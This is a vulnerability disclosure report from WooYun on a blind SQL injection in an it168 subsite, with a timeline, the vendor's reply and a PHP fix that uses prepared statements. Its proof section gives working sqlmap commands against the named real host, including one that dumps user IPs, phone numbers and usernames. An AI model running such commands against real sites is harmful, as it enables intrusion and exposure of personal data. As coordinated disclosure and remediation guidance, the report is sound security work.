Vulnerability summary (24 followers)

Defect ID: wooyun-2014-078562

Title: SQL injection vulnerability on an it168 subsite

Vendor: IT168.com

Author: Eoh

Submitted: 2014-10-07 17:21

Fixed: 2014-11-21 17:22

Published: 2014-11-21 17:22

Type: SQL injection

Severity: High

Self-rated Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags:


Vulnerability details

Disclosure status:

2014-10-07: Details sent to the vendor, awaiting vendor handling
2014-10-09: Vendor confirmed; details visible to the vendor only
2014-10-19: Details disclosed to core white hats and domain experts
2014-10-29: Details disclosed to regular white hats
2014-11-08: Details disclosed to intern white hats
2014-11-21: Details disclosed to the public

Brief description:

Dangerous characters in user input are not properly sanitized.

Detailed description:

The brandid parameter is injectable. The injection is blind and was confirmed with sqlmap's time-based technique (note the --time-sec option):
python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 --banner

web application technology: PHP 5.5.5, Nginx
back-end DBMS: MySQL >= 5.0.0
banner: '5.1.50-log'

Proof of vulnerability:

python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 --dbs
available databases [38]:


python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 -D diaocha -T it168_2009 -C id,ip,phone,username --start=1 --stop=100 --dump
Only the first 100 rows were retrieved. The dumped table contained user IP addresses, phone numbers and usernames.
Database: diaocha
Table: it168_2009
[100 entries]

Fix:

Use parameterized SQL statements, and validate that brandid is a numeric ID before it reaches the query.
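To make the fix concrete, here is an added example (not code from it168 or from this report) of a hypothetical brandid lookup in the concatenating style that produces this class of bug, next to the parameterized form. The table name `brand`, the column names, the connection placeholders and the PHP 7.1+ syntax are all assumptions.

```php
<?php
// Added example, not the it168 code. Assumed schema: table `brand` with
// columns `id` and `print_name`; connection values are placeholders.

// BEFORE (hypothetical vulnerable pattern): brandid is concatenated into
// the SQL text, so whatever the client sends becomes part of the query.
function getBrandPrintVulnerable(mysqli $db, string $brandid): ?string
{
    $sql = "SELECT print_name FROM brand WHERE id = " . $brandid;
    $res = $db->query($sql);
    $row = $res ? $res->fetch_assoc() : null;
    return $row['print_name'] ?? null;
}

// AFTER: check the type first, then bind the value through a prepared
// statement so the server receives it as data, never as SQL.
function getBrandPrintSafe(PDO $db, $brandid): ?string
{
    // brandid is an integer key; anything else is rejected before any query runs.
    if (!is_string($brandid) || !ctype_digit($brandid) || strlen($brandid) > 10) {
        return null;
    }
    $stmt = $db->prepare('SELECT print_name FROM brand WHERE id = :id');
    $stmt->bindValue(':id', (int) $brandid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['print_name'];
}

// Real (server-side) prepares rather than client-side emulation, and
// exceptions instead of silent failures so errors are not swallowed.
$db = new PDO(
    'mysql:host=DB_HOST;dbname=DB_NAME;charset=utf8',   // placeholders
    'DB_USER',
    'DB_PASS',
    [
        PDO::ATTR_EMULATE_PREPARES => false,
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    ]
);

// Hypothetical handler for action=get_brand_print.
if (($_GET['action'] ?? '') === 'get_brand_print') {
    $name = getBrandPrintSafe($db, $_GET['brandid'] ?? '');
    echo $name === null ? 'not found' : htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
}
```

The integer check also removes the time-based blind channel the report used, since a value that is not all digits never reaches MySQL.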

Copyright notice: please credit the source when reproducing: Eoh@WooYun


Vulnerability response

Vendor response:

Severity: Low

Vulnerability Rank: 1

Confirmed: 2014-10-09 10:28

Vendor reply:

This was a discontinued service; because of an internal communication problem, the reference pointing to it had not been taken down. Thanks for the help.

Latest status:

None yet

